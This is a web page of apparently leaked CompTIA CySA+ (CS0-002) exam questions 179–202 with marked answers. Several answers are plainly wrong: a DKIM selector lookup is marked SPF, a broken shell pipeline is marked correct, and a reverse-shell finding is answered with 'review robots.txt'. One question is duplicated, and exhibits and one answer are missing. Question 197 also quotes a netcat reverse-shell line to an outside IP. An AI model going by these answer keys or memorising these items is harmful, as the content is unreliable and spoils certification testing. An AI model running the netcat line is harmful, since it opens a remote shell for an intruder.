[February 2023] Updated CompTIA CS0-002 question set: raise your pass rate with the CS0-002 exam question set [Q179-Q202]

A question set to help you reach your goal! To prepare for and pass the CompTIA Cybersecurity Analyst (CySA+) Certification Exam, we recommend the real CompTIA CS0-002 question set.

Question 179
A security analyst is reviewing a suspected phishing campaign that has targeted an organization. The organization has enabled a few email security technologies in the last year; however, the analyst believes the security features are not working. The analyst runs the following command:
> dig domain._domainkey.comptia.orq TXT
Which of the following email protection technologies is the analyst MOST likely validating?

  • A. DKIM
  • B. DMARC
  • C. DNSSEC
  • D. SPF

Correct answer: D

Question 180
A system's authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthentication activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below:

Based on the scenario and the output from the vulnerability scan, which of the following should the security team do with this finding?

  • A. Ensure HTTP validation is enabled by rebooting the server.
  • B. Accept this risk for now because this is a "high" severity, but testing will require more than the four days available, and the system ATO needs to be completed.
  • C. Ignore it. This is a false positive, and the organization needs to focus its efforts on other findings.
  • D. Remediate by going to the web config file, searching for the enforce HTTP validation setting, and manually updating to the correct setting.

Correct answer: D

Question 181
A web application has a newly discovered vulnerability in the authentication method used to validate known company users. The user ID of Admin with a password of "password" grants elevated access to the application over the Internet. Which of the following is the BEST method to discover the vulnerability before a production deployment?

  • A. User acceptance testing
  • B. Input validation
  • C. Stress test the application
  • D. Manual peer review

Correct answer: B

Question 182
Which of the following systems would be at the GREATEST risk of compromise if found to have an open vulnerability associated with perfect forward secrecy?

  • A. SIEM
  • B. Virtual hosts
  • C. Endpoints
  • D. Layer 2 switches
  • E. VPN concentrators

Correct answer: E

Question 183
A system's authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthentication activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below:

Based on the scenario and the output from the vulnerability scan, which of the following should the security team do with this finding?

  • A. Ensure HTTP validation is enabled by rebooting the server.
  • B. Accept this risk for now because this is a "high" severity, but testing will require more than the four days available, and the system ATO needs to be completed.
  • C. Ignore it. This is a false positive, and the organization needs to focus its efforts on other findings.
  • D. Remediate by going to the web config file, searching for the enforce HTTP validation setting, and manually updating to the correct setting.

Correct answer: D

Question 184
An organization's internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual machine to at the use of the cloud hosted hypervisor, the threat actor has escalated the access rights. Which of the following actions would be BEST to remediate the vulnerability?

  • A. Sandbox the virtual machine.
  • B. Implement dedicated hardware for each customer.
  • C. Update to the secure hypervisor version.
  • D. Implement an MFA solution.

Correct answer: C

Question 185
A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops.
Which of the following tools would be appropriate to use in this case?

  • A. DLP
  • B. FIM
  • C. SHA1sum
  • D. MSBA

Correct answer: C

Question 186
A security analyst is responding to an incident on a web server on the company network that is making a large number of outbound requests over DNS. Which of the following is the FIRST step the analyst should take to evaluate this potential indicator of compromise?

  • A. Reimage the machine to remove the threat completely and get back to a normal running state.
  • B. Start a network capture on the system to look into the DNS requests to validate command and control traffic.
  • C. Isolate the system on the network to ensure it cannot access other systems while evaluation is underway.
  • D. Run an anti-malware scan on the system to detect and eradicate the current threat.
  • E. Shut down the system to prevent further degradation of the company network.

Correct answer: D

Question 187
An analyst has been asked to provide feedback regarding the controls required by a revised regulatory framework. At this time, the analyst only needs to focus on the technical controls.
Which of the following should the analyst provide an assessment of?

  • A. Tokenization of sensitive data
  • B. Formal identification of data ownership
  • C. Execution of NDAs
  • D. Reporting on data retention and purging activities
  • E. Establishment of data classifications

Correct answer: A

Question 188
The help desk provided a security analyst with a screenshot of a user's desktop:

For which of the following is aircrack-ng being used?

  • A. Rainbow attack
  • B. Brute-force attack
  • C. Wireless access point discovery
  • D. PCAP data collection

Correct answer: A

Question 189
As part of an organization's information security governance process, a Chief Information Security Officer (CISO) is working with the compliance officer to update policies to include statements related to new regulatory and legal requirements. Which of the following should be done to BEST ensure all employees are appropriately aware of changes to the policies?

  • A. Distribute revised copies of policies to employees and obtain a signed acknowledgement from them
  • B. Conduct a risk assessment based on the controls defined in the newly revised policies
  • C. Post the policies on the organization's intranet and provide copies of any revised policies to all active vendors
  • D. Require all employees to attend updated security awareness training and sign an acknowledgement

Correct answer: D

Question 190
An application contains the following log entries in a file named "authlog.log":

A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task?

  • A. cat "authlog.log" | grep "User" | cut -F' ' | echo "username exists: $1"
  • B. grep -e "successfully" authlog.log | awk '{print $2}' | sed s/\'//g
  • C. echo authlog.log > sed 's/User//' | print "username exists: $User"
  • D. cat authlog.log | grep "2016-01-01" | echo "valid username found: $2"

Correct answer: A

Question 191
The Dirty COW attack is an example of what type of vulnerability?

  • A. Malicious code
  • B. Privilege escalation
  • C. Buffer overflow
  • D. LDAP injection

Correct answer: B

Question 192
A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application.
The security administrator notices that the new application uses a port typically monopolized by a virus.
The security administrator denies the request and suggests a new port or service be used to complete the application's task.
Which of the following is the security administrator practicing in this example?

  • A. Port security
  • B. Implicit deny
  • C. Explicit deny
  • D. Access control lists

Correct answer: D

Question 193
A security analyst is reviewing the following DNS logs as part of security-monitoring activities:

Which of the following MOST likely occurred?

  • A. The attack attempted to contact www.gooqle com to verify Internet connectivity.
  • B. The attack caused an internal host to connect to a command and control server.
  • C. The attack used encryption to obfuscate the payload and bypass detection by an IDS.
  • D. The attack used an algorithm to generate command and control information dynamically.

Correct answer: B

Question 194
A cybersecurity consultant is reviewing the following output from a vulnerability scan against a newly installed MS SQL Server 2012 that is slated to go into production in one week:

Based on the above information, which of the following should the system administrator do?
(Select TWO).

  • A. Implement the proposed solution by installing Microsoft patch Q316333.
  • B. Mark the result as a false positive so it will show in subsequent scans.
  • C. Configure a network-based ACL at the perimeter firewall to protect the MS SQL port.
  • D. Review the references to determine if the vulnerability can be remotely exploited.
  • E. Verify the vulnerability using penetration testing tools or proof-of-concept exploits.

Correct answer: A,C

Question 195
Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the desk ticket queue.
INSTRUCTIONS
Click on the ticket to see the ticket details. Additional content is available on tabs within the ticket. First, select the appropriate issue from the drop-down menu. Then, select the MOST likely root cause from the second drop-down menu. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Correct answer:

Explanation:

Question 196
A cybersecurity analyst is reviewing the following outputs:

Which of the following can the analyst infer from the above output?

  • A. The remote host is running a web server on port 80.
  • B. The remote host is running a service on port 8080.
  • C. The remote host is redirecting port 80 to port 8080.
  • D. The remote host's firewall is dropping packets for port 80.

Correct answer: B

Question 197
A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

In some of the portal's startup command files, the following command appears:
nc -o /bin/sh 72.14.1.36 4444
Investigating further, the analyst runs Netstat and obtains the following output:

Which of the following is the best step for the analyst to take NEXT?

  • A. Manually review the robots.txt file for errors
  • B. Initiate the security incident response process
  • C. Recommend training to avoid mistakes in production command files
  • D. Delete the unknown files from the production servers
  • E. Patch a new vulnerability that has been discovered

Correct answer: A

Question 198
An organization has been conducting penetration testing to identify possible network vulnerabilities. One of the security policies states that web servers and database servers must not be co-located on the same server unless one of them runs on a non-standard. The penetration tester has received the following outputs from the latest set of scans:

Which of the following servers is out of compliance?

  • A. orgServer
  • B. finServer
  • C. opsServer
  • D. adminServer

Correct answer: A

Question 199
Which of the following should a database administrator implement to BEST protect data from an untrusted server administrator?

  • A. Data encryption
  • B. Data minimization
  • C. Data deidentification
  • D. Data masking

Correct answer: A

Question 200
A developer downloaded and attempted to install a file transfer application in which the installation package is bundled with adware. The next-generation antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?

  • A. Remove administrative rights from all developer workstations.
  • B. Blacklist the hash in the next-generation antivirus system.
  • C. Block the download of the file via the web proxy.
  • D. Manually delete the file from each of the workstations.

Correct answer: C

Question 201
A storage area network (SAN) was inadvertently powered off while power maintenance was being performed in a datacenter. None of the systems should have lost all power during the maintenance. Upon review, it is discovered that a SAN administrator moved a power plug when testing the SAN's fault notification features.
Which of the following should be done to prevent this issue from reoccurring?

  • A. Install a third power supply in the SAN so loss of any power input does not result in the SAN completely powering off.
  • B. Ensure power configuration is covered in the datacenter change management policy and have the SAN administrator review this policy.
  • C. Install additional batteries in the SAN power supplies with enough capacity to keep the system powered on during maintenance operations.
  • D. Ensure both power supplies on the SAN are serviced by separate circuits, so that if one circuit goes down, the other remains powered.

Correct answer: D

Question 202
......
